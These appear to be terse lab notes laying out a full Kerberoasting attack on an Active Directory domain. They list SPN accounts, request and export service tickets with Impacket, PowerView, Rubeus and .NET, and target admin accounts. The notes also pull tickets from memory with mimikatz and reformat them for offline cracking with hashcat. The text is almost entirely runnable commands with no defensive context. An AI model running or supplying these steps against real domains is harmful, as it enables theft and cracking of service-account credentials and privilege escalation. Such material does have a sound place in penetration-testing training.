- Listing SPN accounts:
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend
- To get TGS ticket
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev
Or just request works too.
- To import and view all users
Import-Module .\PowerView.ps1
Get-DomainUser * -spn | select samaccountname
- Exporting all tickets to a CSV file
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\ilfreight_tgs.csv -NoTypeInformation
- Viewing it
cat .\ilfreight_tgs.csv
- Check options
.\Rubeus.exe
- To check stats:
.\Rubeus.exe kerberoast /stats
.\Rubeus.exe kerberoast /nowrap /tgtdeleg
- To get hash
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #admincount gives high-value targets
To get RC4 encrypted (etype 23) use /tgtdeleg
- Enumerating SPNs
setspn.exe -Q */* - Targeting single user:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/DEV-PRE-SQL.inlanefreight.local:1433"
- Retrieving all tickets `
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
- Extracting tickets from memory using mimikatz:
mimikatz # base64 /out:true
isBase64InterceptInput is false
isBase64InterceptOutput is true
mimikatz # kerberos::list /export
- Now to crack:
echo "<base64 blob>" | tr -d \\n
cat encoded_file | base64 -d > sqldev.kirbi
Use Kirbi2john Then modify crack_file from using kirbi2john:
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
Now run the output through hashcat